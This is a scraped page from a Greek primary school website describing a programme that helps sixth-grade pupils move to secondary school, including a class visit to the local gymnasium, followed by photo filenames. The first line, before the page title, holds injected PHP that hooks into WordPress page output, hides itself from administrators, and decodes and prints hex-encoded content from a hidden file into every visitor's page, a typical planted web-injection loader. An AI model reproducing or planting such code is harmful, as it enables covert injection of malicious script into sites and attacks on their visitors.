if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Μετάβαση από το Δημοτικό στο Γυμνάσιο |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Μετάβαση από το Δημοτικό στο Γυμνάσιο

Η μετάβαση των μαθητών (Στ΄ τάξης) του δημοτικού στο γυμνάσιο ανοίγει μια νέα πόρτα στη ζωή τους, η οποία συνδέει την παιδικότητα με την εφηβεία και την ανεμελιά με την υπευθυνότητα και το άγχος της επιβίωσης, σε ένα νέο και με περισσότερες απαιτήσεις κοινωνικό περιβάλλον.
Από την αρχή του εκπαιδευτικού έτους, στόχος του σχολείου (διευθυντής, εκπαιδευτικοί, δάσκαλοι Στ΄ τάξης) είναι να διαμορφωθεί ένα πλαίσιο όπου θα διευκολύνει τη μετάβαση στων μαθητών στη δευτεροβάθμια εκπαίδευση. Ο τρόπος που πραγματοποιούνται τα μαθήματα, η αντιμετώπιση των παιδιών, οι απαιτήσεις από αυτά αλλά και η βαθμολογία στις γραπτές και προφορικές αξιολογήσεις γίνεται με γνώμονα τη σύνδεση των δύο βαθμίδων εκπαίδευσης.
Καθημερινά, διαμέσου της συζήτησης, της ανταλλαγής απόψεων και της επαφής με νέα γνωστικά αντικείμενα, τα οποία θα διδαχθούν την επόμενη χρονιά (π.χ οδύσσεια, εξισώσεις, δυνάμεις, η αλήθεια στη θρησκευτική πίστη, το περιβάλλον και οι ανθρώπινες σχέσεις) προωθείται η γνωστική και ψυχολογική ενδυνάμωση, των μαθητών μας προκειμένου να αντιμετωπίσουν με επιτυχία τις νέες προκλήσεις και να βγουν νικητές όλοι, και όχι μόνο το ποσοστό εκείνο που είναι γνωστικά έτοιμο να επιβιώσει.
Κύριος στόχος είναι να συνειδητοποιήσουν, ότι δεν πηγαίνουν σε ένα περιβάλλον όπου θα νιώθουν απομονωμένοι και αβοήθητοι αλλά θα μεταβούν σε ένα χώρο όπου οι εκπαιδευτικοί της δευτεροβάθμιας εκπαίδευσης θα τους προσφέρουν όλα εκείνα τα εφόδια ώστε να κατορθώσουν να τα κάνουν πλεονέκτημα και να ισχυροποιήσουν την προσωπικότητά τους προς όφελος τόσο των ιδίων όσο και του ευρύτερου κοινωνικού συνόλου.
Το Δημοτικό Σχολείο Λεωνιδίου συμμετέχοντας στο πρόγραμμα ?μετάβαση από το δημοτικό στο γυμνάσιο? οι μαθητές της ΣΤ΄τάξης του σχολείου μας επισκέφθηκαν (με τους δασκάλους Κα. Τσουκάτου Ειρήνη, κ. Βλάχος Ηλίας και με την παρουσία της συμβούλου της περιφέρειάς μας κα. Καρούτζου Γεωργία) το γυμνάσιο όπου αρχικά ξεναγήθηκαν από τη διευθύντρια του γυμνασίου κα. Πορφύρη Πολυξένη στους χώρους του κι εν συνεχεία παρακολούθησαν το μάθημα των αρχαίων ελληνικών και της οικιακής οικονομίας.
Πριν την πραγματοποίηση της επίσκεψης οι μαθητές προχώρησαν σε βιωματικές δραστηριότητες στο χώρο της τάξης, όπου εργαζόμενοι είτε ατομικά είτε ομαδικά κατάφεραν, με ευχάριστη διάθεση να αντιμετωπίσουν όλες τις δραστηριότητες.
Στη συνέχεια αναρτούνται εικόνες από όλα τα βήματα- ενότητες του προγράμματος, πριν και κατά τη διάρκεια της μετάβασης. Μετά το τέλος της επίσκεψης οι μαθητές μας έγραψαν τα συναισθήματα και τις απόψεις τους για το νέο χώρο αλλά και ανέλυσαν το πλάνο τους για μια δυναμική και ουσιαστική παρουσία στο γυμνάσιο.
Ο Δάσκαλος του ΣΤ1 Βλάχος Ηλίας
P1010298.JPG

P1010290.JPG

P1010295.JPG

P1010311.JPG

SAM_0141.JPG

SAM_0142.JPG SAM_0137.JPG SAM_0133.JPG SAM_0130.JPG